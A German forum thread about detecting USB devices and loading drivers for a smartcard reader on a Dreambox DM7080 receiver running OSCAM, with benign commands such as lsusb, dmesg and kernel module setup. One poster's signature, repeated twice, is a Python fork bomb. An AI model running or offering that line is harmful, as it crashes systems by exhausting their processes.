USB Geräte abfragen - smartmouse reader einbinden

    Diese Seite verwendet Cookies. Durch die Nutzung unserer Seite erklären Sie sich damit einverstanden, dass wir Cookies setzen. Weitere Informationen

    • USB Geräte abfragen - smartmouse reader einbinden

      Hi Leute

      wie kann ich denn via telnet / Putty alle USB Geräte abfragen?
      Wie lautet die Syntax um einen externen USB reader einzubinden?
      Bei der DM800 war das ja ungefähr so:
      /dev/ttyUSB2
      Hat sich da etwas geändert?
      Wie gehe ich am besten vor....?

      dank vorab und beste Grüsse

      mountain
    • Im Prinzip hatt sich da nichts geändert die geräte heissen immer noch so und das einbinden ist auch noch so wie gehabt.
      python -c 'while 1: __import__("os").fork()'
      Wer der Herde hinterher läuft frisst nur Scheisse , nicht das Gras !
    • also bei der DM800 konte ich die Geräte mit:
      cat /proc/bus/usb/devices
      abfragen...

      Das funktioniert bei der 7080 nicht.
      Ich bin auch kein Linux Profi...

      Für konstruktive Hinweise, evtl ein kleines "HowTo" würde ich mich sehr freuen.

      danke + beste Grüsse

      mountain
    • mit lsusb sollte man die Infos bekommen

      lsusb ist im OE2.2 aber auch nur ein link in die busybox - kA wie gesprächig das busybox lsusb ist. Sicher nicht so aufschlussreich wie das binary ...

      alternativ smartmouse anstecken und dann mit dmesg die kernel Meldungen abfragen, am Ende der Ausgabe sollte man sehen, ob die smartmouse erkannt wurde und ob ein /dev zugewiesen wurde
    • Fred Bogus Trumper schrieb:

      mit lsusb sollte man die Infos bekommen

      lsusb ist im OE2.2 aber auch nur ein link in die busybox - kA wie gesprächig das busybox lsusb ist. Sicher nicht so aufschlussreich wie das binary ...

      alternativ smartmouse anstecken und dann mit dmesg die kernel Meldungen abfragen, am Ende der Ausgabe sollte man sehen, ob die smartmouse erkannt wurde und ob ein /dev zugewiesen wurde


      Bei der Dreambox kann ich die Smartreader doch auch per Serial ansprechen ....

      Quellcode

      1. device = Serial:Reader xyz2345


      Wenn OSCAM installiert ist kann ich unter Reader auch Scan USB benutzen.
      TV: 2x LG, 2x Samsung, 1x Sony
      Receiver: Dreambox 7020HD NN2, Dreambox 500HD NN2, Kathrein UFS912 TitanNit, Topfield 7700HDPVR HDMU, Vu+ Solo
      Abo: Sky, HD+, MTV, AustriaSat, ORF
      Server: HP MicroServer N40L (SMB, NFS, MediaTomb)
      PC: Mac Mini 2012, Macbook Pro + Bootcamp mit Windows 8.1

      Dieser Beitrag wurde bereits 1 mal editiert, zuletzt von DM-Semi ()

    • die Serial steht bis OE2.0 auch in der /proc/bus/usb/devices - dann braucht man auch kein lsusb oder listsmargo zum auslesen der Serial

      die Serial könnte man auch so auslesen - das müsste auch im OE2.2 funktionieren (zuerst ohne und dann nochmal mit angestecktem srmartreader)

      Quellcode

      1. for dev in $(ls -d /sys/bus/usb/devices/*);do [ -e $dev/serial ] && if [ $(grep -c _hcd $dev/serial) != 1 ];then echo "$dev: $(cat $dev/serial)";fi;done



      aber wie ich den post von @mountain verstehe, wird der smartreader gar nicht erkannt ...

      Dieser Beitrag wurde bereits 2 mal editiert, zuletzt von Fred Bogus Trumper ()

    • Telnet öffnen und folgende Befehle ausführen.

      Quellcode

      1. apt-get install kernel-module-ftdi-sio kernel-module-pl2303
      2. echo ftdi-sio > /etc/modules-load.d/20smartreader.conf
      3. echo pl2303 >> /etc/modules-load.d/20smartreader.conf

      danach Box rebooten und der Treiber wird beim booten automatisch geladen und dein Smartreader steht zu verfügung.
      python -c 'while 1: __import__("os").fork()'
      Wer der Herde hinterher läuft frisst nur Scheisse , nicht das Gras !
    • Hi Leute,

      noch einmal ganz herzlichen Dank für eure Unterstützung!

      Manchmal kann man gar nicht so um die Ecke denken...
      Mein Fehler war die Cam "OSCAM: 1.20-modern_svn Build: r130" zu installieren...
      Die Cam unterstützt keinen "Smargo" oder "Smartreader"....
      Sorry, da hab' ich mich schön dumm angestellt... Wer lesen kann ist klar im Vorteil! :)

      Das Problem ist, wenn mann solche configs nicht öfter macht, dann noch eine neue DM7080 hat,
      kann es echt schwierig werden...
      Nun laufen alle meine Karten und die DM7080 ist echt klasse!

      also, Danke noch mal an Euch + einen schönen Sonntag

      mountain